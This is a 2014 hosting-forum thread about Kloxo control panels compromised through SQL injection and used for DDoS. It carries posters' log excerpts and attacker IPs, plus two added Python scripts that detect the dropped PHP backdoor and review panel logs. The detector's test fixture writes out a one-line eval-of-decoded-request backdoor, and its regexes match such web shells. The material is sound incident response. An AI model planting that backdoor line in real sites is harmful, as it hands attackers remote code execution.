# Kloxo installations compromised



## Damian (Jan 28, 2014)

We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into  ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

*UPDATE:* default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):

> <?php
> 
> set_time_limit(0);error_reporting(NULL);
> 
> ...

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via that variable. This is obviously bad.

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's affected Ramnode, if not others. Beware!
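Added example (editor's addition, not code from the original post or from the Kloxo project): a read-only scan of the Kloxo default-site directory for PHP files that match the indicators described above, i.e. execution gated on a `$_REQUEST` key with the payload decoded before it is run, the `set_time_limit(0);error_reporting(NULL);` preamble, and root ownership of the file as reported later in the thread. The directory path comes from the thread; the regexes, the `build_sample_dir()` fixture and the sample file contents are constructed for the example. Nothing from the inspected files is executed.

```python
import re
import tempfile
from pathlib import Path

# Directory named in the thread; the scan takes it as a parameter so it can be
# pointed at a forensic copy or a test directory instead.
KLOXO_DEFAULT_DIR = "/home/kloxo/httpd/default"

# Shape of the dropped file as the thread describes it: a request key acts as
# the gate, and whatever was passed is decoded and then run.
REQUEST_GATE = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\s*\[", re.IGNORECASE)
DECODE_THEN_RUN = re.compile(
    r"\b(eval|assert|create_function|preg_replace)\s*\(.*?"
    r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE | re.DOTALL,
)
# Preamble quoted in the thread: unlimited runtime, errors silenced.
QUIET_PREAMBLE = re.compile(
    r"set_time_limit\s*\(\s*0\s*\).*?error_reporting\s*\(", re.IGNORECASE | re.DOTALL
)


def inspect_php(path: Path) -> dict:
    """Return the indicators found in one PHP file; the file is only read, never run."""
    text = path.read_text(errors="replace")
    st = path.stat()
    reasons = []
    if REQUEST_GATE.search(text) and DECODE_THEN_RUN.search(text):
        reasons.append("request_gated_decode_and_eval")
    if QUIET_PREAMBLE.search(text):
        reasons.append("suppresses_errors_and_time_limit")
    if st.st_uid == 0:
        # Steven's post: the dropped default.php is owned by root, which the web
        # server serving this directory should never produce on its own.
        reasons.append("owned_by_root")
    return {"file": path.name, "size": st.st_size, "mtime": int(st.st_mtime), "reasons": reasons}


def scan_default_dir(directory=KLOXO_DEFAULT_DIR):
    """Inspect every .php file in the default site; return those with a content indicator.

    Root ownership alone is reported as context, not as a finding by itself.
    """
    findings = []
    for path in sorted(Path(directory).glob("*.php")):
        info = inspect_php(path)
        if any(r != "owned_by_root" for r in info["reasons"]):
            findings.append(info)
    return findings


def build_sample_dir() -> str:
    """Constructed sample directory: a benign index.php beside two files shaped like the dropped one."""
    d = tempfile.mkdtemp(prefix="kloxo-default-")
    benign = "<?php\nheader('Content-Type: text/html');\necho 'Default site';\n"
    # Constructed stand-in matching the thread's description (gate on a request
    # key, decode, run); the key name is made up, not the real file's contents.
    dropped = (
        "<?php\nset_time_limit(0);error_reporting(NULL);\n"
        "if (isset($_REQUEST['x7q'])) { eval(base64_decode($_REQUEST['x7q'])); }\n"
    )
    Path(d, "index.php").write_text(benign)
    Path(d, "a9fk2zq1.php").write_text(dropped)   # randomly named drop
    Path(d, "default.php").write_text(dropped)    # the overwritten default.php
    return d


if __name__ == "__main__":
    for finding in scan_default_dir(build_sample_dir()):
        print(finding)
```

Run it against `/home/kloxo/httpd/default` on a suspect container (or, better, a copy taken off the box) by calling `scan_default_dir()` with no argument; any file reported should be preserved for review before the container is reinstalled, since a match confirms compromise of the panel rather than of that one file.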


----------



## peterw (Jan 28, 2014)

Second free panel which does have security issues.


----------



## Steven (Jan 28, 2014)

Important to note that the default.php file is owned by root.


----------



## vRozenSch00n (Jan 28, 2014)

Kloxo "Host In A Box" template is a disaster as it has never been upgraded for years. Moreover, regular users never upgrade new installations to the latest version (6.1.12) and they don't use any firewall.

Even the latest version has many vulnerabilities i.e. recursive bind, apache exploit through lxphp, brute force through the admin login and several other minor issues such as master/slave config that will break apache vhost configuration. 

AFAIK there was a disagreement among the developers, which led to the Kloxo-MR fork.


----------



## SkylarM (Jan 28, 2014)

We don't provide that template, but just suspended like 15-20 containers for this. Killed CPU on nodes long before any massive network issues, but the amount of them caused a few fun times


----------



## Steven (Jan 28, 2014)

Null 178.248.23.0/24 on your network everyone.


----------



## vRozenSch00n (Jan 28, 2014)

My test VPS was also compromised with the same issue, and I found out from the log that they brute forced the control panel login. The log shows that it comes from IP 178.248.23.39


----------



## Steven (Jan 28, 2014)

It appears to be an SQL injection:

> access_log:178.248.23.58 - [26/Jan/2014:18:11:58 +0300] "_<snipped the inject>_ HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0"

They are getting access to the admin user:

> login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29

They are injecting files using display.php

> shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
> filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root

NOTE: default.php is being injected into 'every' account.
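Added example (editor's addition, not code from the original post or from the Kloxo project): a small reviewer for the Kloxo log lines quoted above. It flags admin logins from any address not on an allow-list or inside the 178.248.23.0/24 range posted in this thread, panel `shell_exec` entries and `Chown ... to root:root` entries that touch the default site, and HTTP requests from the suspect networks. The log formats are taken from the quoted lines; the regexes, the `SUSPECT_NETWORKS` list (the /24 plus the OVH address from the first post), the allow-list parameter and the sample log are constructed for the example. The injected request itself stays snipped, as in the original.

```python
import ipaddress
import re

# Network the thread recommends null-routing, plus the OVH address seen
# triggering the dropped script in the first post.
SUSPECT_NETWORKS = [
    ipaddress.ip_network("178.248.23.0/24"),
    ipaddress.ip_network("176.31.146.168/32"),
]
# Directory the thread reports files being dropped into.
DEFAULT_SITE = "/home/kloxo/httpd/default/"

# Patterns derived from the log lines quoted in the thread.
LOGIN_RE = re.compile(r"^login_success:(?P<time>\S+ \S+): Successful Login to (?P<user>\S+) from (?P<ip>[\d.]+)")
SHELL_RE = re.compile(r"^shell_exec:(?P<time>\S+ \S+): .*?\[\(__system__:(?P<cwd>[^)]*)\) (?P<cmd>.*)\]$")
CHOWN_RE = re.compile(r"^filesys:(?P<time>\S+ \S+): Chown (?P<path>\S+) to (?P<owner>\S+)")
ACCESS_RE = re.compile(r'^(?:access_log:)?(?P<ip>[\d.]+) - .*?\[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def ip_is_suspect(ip: str) -> bool:
    """True when the address falls inside one of the networks named in the thread."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in SUSPECT_NETWORKS)


def review_lines(lines, allowed_admin_ips=()):
    """Return (kind, detail, raw_line) tuples for the events worth a human look."""
    findings = []
    for raw in lines:
        line = raw.rstrip("\n")
        m = LOGIN_RE.match(line)
        if m:
            if m["user"] == "admin" and (ip_is_suspect(m["ip"]) or m["ip"] not in allowed_admin_ips):
                findings.append(("admin_login_unexpected_ip", m["ip"], line))
            continue
        m = SHELL_RE.match(line)
        if m:
            if DEFAULT_SITE in m["cmd"]:
                findings.append(("panel_shell_exec_touches_default_site", m["cwd"], line))
            continue
        m = CHOWN_RE.match(line)
        if m:
            if m["path"].startswith(DEFAULT_SITE) and m["owner"] == "root:root":
                findings.append(("default_site_file_chowned_to_root", m["path"], line))
            continue
        m = ACCESS_RE.match(line)
        if m and ip_is_suspect(m["ip"]):
            findings.append(("http_request_from_suspect_network", m["ip"], line))
    return findings


# Constructed sample built from the lines quoted in the thread, plus one benign
# admin login from a documentation address to show the allow-list path.
SAMPLE_LOG = """\
access_log:178.248.23.58 - [26/Jan/2014:18:11:58 +0300] "<snipped the inject> HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0"
login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29
shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root
login_success:09:02 Jan/27/2014: Successful Login to admin from 203.0.113.10
"""


def review_sample():
    """Run the reviewer over the constructed sample with 203.0.113.10 allow-listed."""
    return review_lines(SAMPLE_LOG.splitlines(), allowed_admin_ips=("203.0.113.10",))


if __name__ == "__main__":
    for kind, detail, line in review_sample():
        print(f"{kind:40} {detail}")
```

The order of the four findings on the sample is the order of the compromise Steven reconstructs: injected request, admin login, file dropped through the panel, file chowned to root. On a real box, feed it the panel log and the default site's access log together and treat any `admin_login_unexpected_ip` that is followed by a `default_site_file_chowned_to_root` as confirmation rather than as a lead.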


----------



## SkylarM (Jan 28, 2014)

I hate Kloxo. I hate zPanel. Ugh.


----------



## DaringHost (Jan 28, 2014)

Also just suspended a decent number of VPS's who were affected by this. I checked the admin access logs for one client and see that the admin account was accessed by these two IP addresses: 178.248.23.122 and 178.248.23.174

Nulled 178.248.23.0/24 across all servers.


----------



## vRozenSch00n (Jan 28, 2014)

@Steven It was an old vulnerability http://forum.lxcenter.org/index.php?t=msg&th=19215&prevloaded=1&&start=120


----------



## MannDude (Jan 28, 2014)

Protect yourselves, but please don't post the actual exploit or method of injecting.


----------



## Steven (Jan 28, 2014)

vRozenSch00n said:


> @Steven It was an old vulnerability http://forum.lxcenter.org/index.php?t=msg&th=19215&prevloaded=1&&start=120


Yes, it's related to an old hack.

http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646&#msg_102646

specifically.

It's being done via the webcommand.php which also calls those functions.


----------



## vRozenSch00n (Jan 28, 2014)

As I stated before, after the disagreement (which makes me sad), Kloxo development slowed down and Kloxo-MR managed to fork its way to a more secure and stable control panel, with the ability to change php version on the fly and using nginx or varnish as reverse proxy.


----------



## wlanboy (Jan 28, 2014)

SkylarM said:


> I hate Kloxo. I hate zPanel. Ugh.


Second that - both are beyond any repair.


----------



## DomainBop (Jan 28, 2014)

Iniz sent out emails today requiring clients to remove Kloxo immediately. Hopefully other hosts will also ban the use of Kloxo (and ZPanel) and remove them from their templates.


----------



## DomainBop (Jan 28, 2014)

vRozenSch00n said:


> Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.


A very large percentage of web sites are running outdated scripts that contain vulnerabilities, including many corporate websites (example: Wordpress 3.4.2 http://mybuys.com/readme.html). It's not surprising that people/companies don't take the security of their websites seriously since many companies and government agencies allow their employees to surf the Internet from their desks using outdated browsers that are full of vulnerabilities (I'm looking at a piwik report for one of my sites and I see a visitor from the US Postal Service who is using Internet Explorer 7)


----------



## MartinD (Jan 28, 2014)

This is wreaking havoc - totally come out of nowhere and gone nuts!


----------



## wlanboy (Jan 28, 2014)

DomainBop said:


> Iniz sent out emails today requiring clients to remove Kloxo immediately. Hopefully other hosts will also ban the use of Kloxo (and ZPanel) and remove them from their templates.


Tactical VPS did that too.

Templates are bad because they suggest (through the eyes of the customer) that they are safe by default because the hoster is offering them.


----------



## vRozenSch00n (Jan 28, 2014)

wlanboy said:


> Second that - both are beyond any repair.


I don't know much about zPanel, but in Kloxo's case, there are a lot of rubbish files leftover and rubbish functions. This is due to the fact that the late Ligesh wanted to integrate Windows and Debian functionalities (you should have seen the source code prior to version 6.1.6). It also seems that the way he coded is based on in time patch.

Yes, it needs a whole lot of cleaning up or simply rewrite from scratch.


----------



## Keen (Jan 28, 2014)

SkylarM said:


> I hate Kloxo. I hate zPanel. Ugh.


I hate Iniz.

If I pay I decide what I want to use! Iniz promotes Vesta. Why?


----------



## Patrick (Jan 28, 2014)

Keen said:


> I hate Iniz.
> 
> If I pay I decide what I want to use! Iniz promotes Vesta. Why?


We recommended it as an alternative, it's up to you if you want to use it. No way did the email force people to use it. Or we can let clients flood in tickets asking what do we use now or we give them a suggestion which has active development.

Hate is a very strong word, unless of course you wish to continue using Kloxo where the malicious script sends out DDoS to Bank of America (of which we won't allow which is why every VPS will be suspended every time they're caught running it by the spike in load from the exploit) in which it can also lead to your sites being hacked if not already done by the attackers.


----------



## Francisco (Jan 28, 2014)

What a clusterfuck.

At peak we were pushing ~1.5M pps out over this crap.

A fairly big handful of nodes simply locked up from conntrack being so slammed.

Not a great thing to get woken up over.

Oh well, I got some adjustments in place that I wanted to.

Francisco


----------



## Mun (Jan 28, 2014)

Any idea whom they were attacking?


----------



## Patrick (Jan 28, 2014)

Mun said:


> Any idea whom they were attacking?


Bank Of America.


----------



## dcdan (Jan 28, 2014)

Yeah, we too have received a long list of attacking IPs from BOFA (although we cleared everything up a few hours before they sent the abuse report). We will be making changes to Nodewatch so that this type of attack is detected automatically.


----------



## peterw (Jan 29, 2014)

A well prepared and executed attack. I hate old 0days that can catch such a lot of servers. At least every provider I am with was sending an email about shutting down all kloxo vps. Best thing to do is reinstalling the whole vps. You don't know if others add something else to your vps.


----------



## vRozenSch00n (Jan 29, 2014)

To avoid confusion:


*Kloxo Official* is the opensource version of former LxCenter's LxAdmin Enterprise, latest version is 6.1.12 (released in March 2012), only supports CentOS 5.x, unstable with lots of security issues.

*Kloxo HIB* *"Host-In-A-Box"* is an old OpenVZ template, and it is an official LxCenter release as a replacement of *LxAdmin Host-In-A-Box*, but it has never been upgraded since its release, only supports CentOS 5.x, unstable with lots of security issues.

*Kloxo-MR* is a fork of Kloxo Official by Mustafa Ramadhan, it is actively developed, supports CentOS 5.x & 6.x. No known security issue.


----------



## keepass (Jan 29, 2014)

Hello,

Ok guys but how I can permanently disable KLOXO for VPS which will be created in future? I don't see option like this "Disable KLOXO button"


----------



## KuJoe (Jan 29, 2014)

keepass said:


> Hello,
> 
> Ok guys but how I can permanently disable KLOXO for VPS which will be created in future? I don't see option like this "Disable KLOXO button"


What do you mean? Can you be more specific in what you're trying to do?



vRozenSch00n said:


> *Kloxo-MR* is a fork of Kloxo Official by Mustafa Ramadhan, it is actively developed, supports CentOS 5.x & 6.x. No known security issue.


Looks like Rack911 found a critical root exploit within minutes of looking at the code. They won't do a free audit on the software but they recommend avoiding anything based off Kloxo including Kloxo-MR. So now I've been recommending a replacement that's not much better than the software being replaced.


----------



## Keen (Jan 30, 2014)

Vesta CP has a lot of installation issues, Kloxo-MR is better.


----------



## peterw (Jan 31, 2014)

Keen said:


> Vesta CP has a lot of installation issues, Kloxo-MR is better.


But not secure.


----------



## vRozenSch00n (Jan 31, 2014)

LXCenter has released Kloxo Version 6.1.13 http://project.lxcenter.org/news/25 to fix the bugs:


6.1.13 Sec #001 Fixed SQL Injection bug

6.1.13 Sec #002 Fixed Filemanager bug


----------

